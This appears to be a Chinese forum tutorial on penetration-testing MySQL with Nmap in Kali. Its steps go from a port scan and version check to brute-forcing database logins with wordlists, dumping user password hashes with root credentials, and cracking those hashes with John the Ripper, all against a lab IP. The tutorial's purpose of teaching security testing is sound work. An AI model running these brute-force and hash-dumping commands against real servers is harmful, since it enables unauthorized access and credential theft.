使用Nmap在Kali中进行MySQL渗透测试:详细指南

利用 Nmap 进行 MySQL 渗透测试 通过 Nmap 工具,我们能够对 MySQL 数据库进行渗透测试,从而收集目标数据库的关键信息,包括数据库名称、表、用户名和密码等。本文将指导您进行这一过程。

🐶端口扫描 首先,我们利用 Nmap 对目标进行端口扫描,确认是否开放了 MySQL 的默认端口 3306。

nmap -T4 -A -sT 192.168.5.38

图片[1]-使用Nmap在Kali中进行MySQL渗透测试:详细指南-山海云端论坛

如上图所示,我们发现目标主机开放了 80、8080 和 3306 等端口,而 3306 端口正是 MySQL 数据库的端口。

🌶️检索 MySQL 信息 通过以下命令,我们可以查看目标 MySQL 数据库的版本、协议等相关信息。

nmap --script=mysql-info 192.168.5.38

图片[2]-使用Nmap在Kali中进行MySQL渗透测试:详细指南-山海云端论坛

如上图所示,目标数据库运行的是 MySQL 版本 5.7.26。

💋暴力破解账号 是的,Nmap 还具备暴力破解功能。执行下面的命令可以尝试破解当前数据库的账号和密码。

nmap -p3306 --script=mysql-brute --script-args userdb=/root/user.txt,passdb=/root/pass.txt 192.168.5.38

参数说明:

  • userdb:用户名字典
  • passdb:密码字典

破解效果如下:

图片[3]-使用Nmap在Kali中进行MySQL渗透测试:详细指南-山海云端论坛

通过这一步,我们获得了两个数据库的用户名和密码:lnds:123456@@wp:123456@@。现在,我们可以利用这些信息尝试登录数据库。

mysql -h 192.168.5.38 -u wp -p

图片[4]-使用Nmap在Kali中进行MySQL渗透测试:详细指南-山海云端论坛

当然,如果您有幸破解了 root 账号的密码,您还可以执行以下两个有趣的命令:

🧸列举其他用户名

nmap -p3306 192.168.5.38 --script=mysql-users --script-args mysqluser=root,mysqlpass=toor

🎊列举其他数据库

nmap -p3306 192.168.5.38 --script=mysql-databases --script-args mysqluser=root,mysqlpass=toor

🇨🇳检索哈希

nmap -p3306 192.168.5.38 --script=mysql-dump-hashes --script-args username=root,password=toor

通过这条命令,我们可以列出数据库中其他用户的哈希值,然后利用工具如 John the Ripper 进行哈希破解,从而获取其他用户的密码。

🦞总结 Nmap 对 MySQL 的渗透测试可见效果显著。然而,需要注意的是,任何工具都有其局限性。正如本文所述,对数据库进行渗透测试需要开启 3306 端口且允许所有人登录,并且需要使用强大的密码字典。

© 版权声明
THE END
喜欢就支持一下吧
点赞11 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容